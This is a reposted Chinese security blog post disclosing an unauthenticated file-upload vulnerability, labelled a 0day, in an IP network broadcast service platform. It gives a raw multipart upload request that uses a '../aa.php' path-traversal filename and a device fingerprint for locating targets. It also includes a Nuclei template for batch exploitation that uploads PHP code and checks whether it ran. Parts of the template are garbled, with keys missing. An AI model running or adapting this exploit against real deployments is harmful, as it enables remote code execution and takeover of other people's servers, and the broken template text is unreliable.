web.icon=="9091011a03bffd9898d79fc589a2c65d"
复现详细步骤
POST /api/v2/remote-upgrade/upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryruvtJJYIs63ReAhU
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 195
------WebKitFormBoundaryruvtJJYIs63ReAhU
Content-Disposition: form-data; name="file"; filename="../aa.php"
Content-Type: application/octet-stream
------WebKitFormBoundaryruvtJJYIs63ReAhU--
审计过程:
如图获取文件上传接口
文件处理函数钟未对上传的文件进行校验
id: ip-broadcast-service-platform-file-upload
info:
name: IP网络广播服务平台文件上传漏洞
author: Ting
severity: critical
description: |
IP网络广播服务平台文件上传漏洞
reference:
https://
metadata:
verified: true
1 :
'icon_hash="-568806419"' :
tags: rce,upload,php
http:
raw:
|
POST /api/v2/remote-upgrade/upload HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 :
multipart/form-data; boundary=----WebKitFormBoundaryruvtJJYIs63ReAhU :
Accept: */*
gzip, deflate, br :
zh-CN,zh;q=0.9 :
Connection: keep-alive
195 :
------WebKitFormBoundaryruvtJJYIs63ReAhU
form-data; name="file"; filename="../aa.php" :
application/octet-stream :
echo md5(1);unlink(__FILE__);?>
------WebKitFormBoundaryruvtJJYIs63ReAhU--
|
GET /uploads/remote_upgrade/{{filepath}}.php HTTP/1.1
Host: {{Hostname}}
and :
matchers:
type: word
part: body_2
words:
'c4ca4238a0b923820dcc509a6f75849b'
condition: and
extractors:
type: regex
name: filepath
group: 1
internal: true
regex:
'\/remote_upgrade\/(.*).php'
可后台回复20240803获取nuclei-yaml
原文始发于微信公众号(Ting丶的安全笔记):IP广播服务平台未授权文件上传getshell-0Day附批量POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论